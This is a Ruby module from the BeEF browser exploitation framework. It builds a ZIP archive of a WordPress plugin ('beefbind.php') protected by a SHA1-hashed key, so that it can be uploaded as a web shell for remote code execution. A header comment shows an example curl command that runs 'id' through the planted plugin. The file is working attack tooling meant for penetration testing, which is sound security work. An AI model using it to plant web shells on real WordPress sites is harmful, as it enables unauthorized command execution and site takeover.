#
# Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# This is a rewrite of the original module misc/wordpress_post_auth_rce.
#
# Original Author: Bart Leppens
# Rewritten by Erwan LR (@erwan_lr | WPScanTeam)
#
# To be executed, the request needs a BEEF header with the value of the auth_key option, example:
# curl -H 'BEEF: c9c3a2dcff54c5e2' -X POST --data 'cmd=id' http://wp.lab/wp-content/plugins/beefbind/beefbind.php
#

require 'digest/sha1'
require_relative '../wordpress_command'

class Wordpress_upload_rce_plugin < WordPressCommand
  class << self
    # Build the plugin ZIP archive in memory and return it as a JS-ready string
    # (every byte written as a \xNN escape). command.js calls this method, so the
    # archive is regenerated from beefbind.php on every use, including when the
    # module is driven by automated rules.
    #
    # @param auth_key [String] the auth_key option; its SHA1 hex digest replaces the
    #   #SHA1HASH# placeholder in beefbind.php (per the header above, requests to the
    #   uploaded file must carry this key in a BEEF header — presumably the PHP side
    #   compares against this digest; confirm in beefbind.php)
    # @return [String] the escaped ZIP bytes
    def generate_zip_payload(auth_key)
      template_path = File.join(File.dirname(__FILE__), 'beefbind.php')
      plugin_source = File.read(template_path).gsub('#SHA1HASH#', Digest::SHA1.hexdigest(auth_key))

      buffer = Zip::OutputStream.write_buffer do |zip|
        zip.put_next_entry('beefbind.php')
        zip.write(plugin_source)
      end
      buffer.rewind

      js_escape(buffer.read)
    end

    # Module options: the parent's list plus an auth_key entry whose default is
    # 8 random bytes as hex (16 characters), drawn anew each time options is evaluated.
    #
    # @return [Array<Hash>] option descriptors
    def options
      auth_key = { 'name' => 'auth_key', 'ui_label' => 'Auth Key', 'value' => SecureRandom.hex(8) }
      super() + [auth_key]
    end

    private

    # Encode every byte of +data+ as a \xNN escape (uppercase hex) so the binary
    # archive can be embedded in a JS string literal.
    #
    # @param data [String] raw bytes
    # @return [String] escaped representation
    def js_escape(data)
      data.bytes.map { |byte| format('\\x%02X', byte) }.join
    end
  end
end